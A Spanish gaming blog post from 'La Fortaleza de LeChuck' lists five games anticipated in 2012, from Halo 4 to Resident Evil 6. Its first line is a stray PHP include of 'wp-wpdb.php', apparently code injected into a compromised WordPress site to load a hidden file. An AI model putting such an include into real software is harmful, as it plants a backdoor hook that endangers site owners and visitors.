if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Los más esperados 2012 – La Fortaleza de LeChuck

Los más esperados 2012

De todos es sabido que no nos pondremos de acuerdo, pero al margen de nuestros gustos individuales, y objetivamente hablando, hay cinco juegos que muchísima gente espera con ilusión, y tu pensarás… A ver, ¿Habiendo salido ya este año Mass Effect 3, The Last Story, Uncharted, etc, que es lo que queda para este año? Pues por ejemplo estos 5 juegos que te recomendamos seguir y de los cuales en La Fortaleza de LeChuck estaremos también al acecho.

Halo 4

Que decir de Halo 4, se espera por varias cosas, el regreso del Jefe Maestro después de dos buenas partes sin el, el primero totalmente pensado con un nuevo motor, con una resolución estándar decente y sin Bungie detrás. Será 343 Industries que ya con lo poco enseñado ha convencido a muchos fans, y todos estamos hypeados con ganas de tenerlo en nuestras consolas.

Project Cars

Después de Gran Turismo 5 y Forza Motorsport 4, pese al anuncio de un nuevo Forza «diferente», nos quedamos con Project Cars como el futuro próximo de la simulación de coches. Multiplataforma, opciones a raudales, muchos circuitos y coches, y un apartado técnico envidiable (que seguro proviene de su versión PC). Los fans del automovilismo tienen puestos los ojos en el, y no parece que decaigan con la información a cuentagotas que va llegando de la mano de Slightly Mad Studios, los desarrolladores.

Assassin’s Creed III

Quizás Assassin’s Creed sea una saga que se ha quemado en demasía, pues en esta misma generación haber sacado ya a la venta tres títulos, no suele ser la media de una saga «AAA«. Por suerte, los fans van creciendo y está claro que la próxima parte con localización en las antiguas américas, ha despertado el gusanillo de más gente de lo que parece, pese a no haber enseñado más que un trailer. Nunca le haremos un feo a un Assassin’s Creed, sobretodo por parte de nuestro náufrago Herman Toothroot que es megafan.

Bioshock Infinite

Bioshock es una saga que personalmente me desmotivó mucho. La primera parte, aunque de ambientación ande sobrada, no acabó de engancharme. Igualmente aprecio que es un juego de bella factura en todos sus apartados, y objetivamente es un juego muy reconocido entre los consoleros. Tras una segunda parte sembrada por las dudas, este Bioshock Infinite trae suficientes novedades como para estar incluso en mi punto de mira, y es que el trailer tiene una pinta arrolladora.

Resident Evil 6

La siempre polémica saga Resident Evil, por ser la esperanza eterna de volver a la jugabilidad clásica, pero que pese a los buenos resultados de ventas y crítica de Resident Evil Revelations, en sobremesa no será así. Con el primer trailer ya en la calle nos quedamos con lo que parece, sigue la acción de Resident Evil 4 y Resident Evil 5, espero que más con la brillantez de la cuarta parte que de ésta ultima, y nos vuelve a situar en Raccon City. No se puede decir que nadie le preste atención al juego pese a todo, ya que los Resident Evil suelen llevar el máximo presupuesto y mimo por parte de Capcom. Esperamos algo realmente bueno que pueda incluso callar al boca a los detractores.

Por suerte, como sabréis, también tendremos algunas sorpresas, con los juegos anunciados en el E3, los juegos indie, arcade, juegos para smartphone o tablet que no deberían estar tan mal, los primeros juegos para Wii U… Todo eso son sorpresas que solo veremos cuando lleguen, entonces miraremos atrás y pensaremos «De aquella lista, ¿Cual ha sido un desmesurado hype que nos ha «zasqueado en toda la boca«?, ¿Que videojuego no estaba en la lista y ha resultado ser un juegazo? Sorpresas que da la vida y que seguro que tampoco nos perdemos. A parte, por supuesto doy, que en la lista no está tu juego más esperado, tranquilo, tengo una solución para ti ¡Coméntanos el porqué de tus ganas por ese juego!
Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

9 comentarios

Dejar un comentario